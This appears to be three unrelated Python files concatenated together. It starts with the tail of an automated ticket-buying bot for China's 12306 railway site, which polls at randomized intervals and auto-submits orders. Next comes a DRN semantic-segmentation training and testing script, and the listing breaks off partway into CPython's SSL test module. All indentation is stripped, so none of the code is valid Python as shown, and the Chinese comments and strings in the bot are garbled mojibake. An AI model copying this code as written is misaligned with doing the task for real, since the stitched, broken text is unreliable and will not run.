from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
start_time=TickerConfig.START_TIME,
end_time=TickerConfig.END_TIME
)
queryResult = q.sendQuery()
# ๆฅ่ฏขๆฅๅฃ
if queryResult.get("status"):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
secretList = queryResult.get("secretList", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
# ่ทๅ่็ณปไบบ
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
# ๅ่กฅ่ฎขๅ้่ฆ่ฎพ็ฝฎๅคไธชๅๅธญ
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList)
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
# ๆไบค่ฎขๅ
# ่ฎขๅๅไธบไธค็ง๏ผไธ็งไธบๆขๅ๏ผไธ็งไธบๅ่กฅ่ฎขๅ
if secretStr: # ๆญฃๅธธไธๅ
if TickerConfig.ORDER_TYPE == 1: # ๅฟซ้ไธๅ
a = autoSubmitOrderRequest(selectObj=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
elif TickerConfig.ORDER_TYPE == 2: # ๆฎ้ไธๅ
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
elif secretList: # ๅ่กฅ่ฎขๅ
c = chechFace(self, secretList, train_no)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
nateMsg = ' ๆ ๅ่กฅๆบไผ' if TickerConfig.ORDER_TYPE == 2 else ""
print(f"ๆญฃๅจ็ฌฌ{num}ๆฌกๆฅ่ฏข ๅ็ๆถ้ด๏ผ{random_time} ไน่ฝฆๆฅๆ: {','.join(TickerConfig.STATION_DATES)} ่ฝฆๆฌก๏ผ{','.join(TickerConfig.STATION_TRAINS) or 'ๆๆ่ฝฆๆฌก'}"\
f" ๆถ้ด่ๅด: {TickerConfig.START_TIME}-{TickerConfig.END_TIME}"\
f" ไธๅๆ ็ฅจ{nateMsg} ่ๆถ๏ผ{(datetime.datetime.now() - now).microseconds / 1000} {queryResult.get('cdn')}")
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
except ValueError as e:
if e == "No JSON object could be decoded":
print(u"12306ๆฅๅฃๆ ๅๅบ๏ผๆญฃๅจ้่ฏ")
else:
print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306ๆฅๅฃๆ ๅๅบ๏ผๆญฃๅจ้่ฏ {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("้ฟๆฒ", "ๆทฑๅณ")
|
segment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import math
import os
from os.path import exists, join, split
import threading
import time
import numpy as np
import shutil
import sys
from PIL import Image
import torch
from torch import nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
import drn
import data_transforms as transforms
try:
from modules import batchnormsync
except ImportError:
pass
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALETTE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
TRIPLET_PALETTE = np.asarray([
[0, 0, 0, 255],
[217, 83, 79, 255],
[91, 192, 222, 255]], dtype=np.uint8)
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
class DRNSeg(nn.Module):
def __init__(self, model_name, classes, pretrained_model=None,
pretrained=True, use_torch_up=False):
super(DRNSeg, self).__init__()
model = drn.__dict__.get(model_name)(
pretrained=pretrained, num_classes=1000)
pmodel = nn.DataParallel(model)
if pretrained_model is not None:
pmodel.load_state_dict(pretrained_model)
self.base = nn.Sequential(*list(model.children())[:-2])
self.seg = nn.Conv2d(model.out_dim, classes,
kernel_size=1, bias=True)
self.softmax = nn.LogSoftmax()
m = self.seg
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
if use_torch_up:
self.up = nn.UpsamplingBilinear2d(scale_factor=8)
else:
up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4,
output_padding=0, groups=classes,
bias=False)
fill_up_weights(up)
up.weight.requires_grad = False
self.up = up
def forward(self, x):
x = self.base(x)
x = self.seg(x)
y = self.up(x)
return self.softmax(y), x
def optim_parameters(self, memo=None):
for param in self.base.parameters():
yield param
for param in self.seg.parameters():
yield param
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
data = list(self.transforms(*data))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
# data = list(self.transforms(*data))
out_data = list(self.transforms(*data))
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))[0]
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score))
logger.info(' * Score {top1.avg:.3f}'.format(top1=score))
return score.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, None,
pretrained=True)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
criterion = nn.NLLLoss2d(ignore_index=255)
criterion.cuda()
# Data loading code
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'],
std=info['std'])
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.extend([transforms.RandomCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t),
list_dir=args.list_dir),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True, drop_last=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir),
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True, drop_last=True
)
# define loss function (criterion) and pptimizer
optimizer = torch.optim.SGD(single_model.optim_parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
logger.info('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
checkpoint_path = 'checkpoint_latest.pth.tar'
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % 1 == 0:
history_path = 'checkpoint_{:03d}.pth.tar'.format(epoch + 1)
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""
Sets the learning rate to the initial LR decayed by 10 every 30 epochs
"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(
pred, name, output_dir + '_color',
TRIPLET_PALETTE if num_classes == 3 else CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
# pdb.set_trace()
outputs = []
for image in images:
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
# _, pred = torch.max(torch.from_numpy(final), 1)
# pred = pred.cpu().numpy()
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, pretrained_model=None,
pretrained=False)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'], std=info['std'])
scales = [0.5, 0.75, 1.25, 1.5, 1.75]
if args.ms:
dataset = SegListMS(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), scales, list_dir=args.list_dir)
else:
dataset = SegList(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir, out_name=True)
test_loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
logger.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
logger.info("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
logger.info("=> no checkpoint found at '{}'".format(args.resume))
out_dir = '{}_{:03d}_{}'.format(args.arch, start_epoch, phase)
if len(args.test_suffix) > 0:
out_dir += '_' + args.test_suffix
if args.ms:
out_dir += '_ms'
if args.ms:
mAP = test_ms(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt,
output_dir=out_dir,
scales=scales)
else:
mAP = test(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
logger.info('mAP: %f', mAP)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(description='')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default=None, required=True)
parser.add_argument('-l', '--list-dir', default=None,
help='List dir to look for train_images.txt etc. '
'It is the same with --data-dir if not set.')
parser.add_argument('-c', '--classes', default=0, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--lr-mode', type=str, default='step')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained', dest='pretrained',
default='', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--bn-sync', action='store_true')
parser.add_argument('--ms', action='store_true',
help='Turn on multi-scale testing')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('--test-suffix', default='', type=str)
args = parser.parse_args()
assert args.classes > 0
print(' '.join(sys.argv))
print(args)
if args.bn_sync:
drn.BatchNorm = batchnormsync.BatchNormSync
return args
def main():
args = parse_args()
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
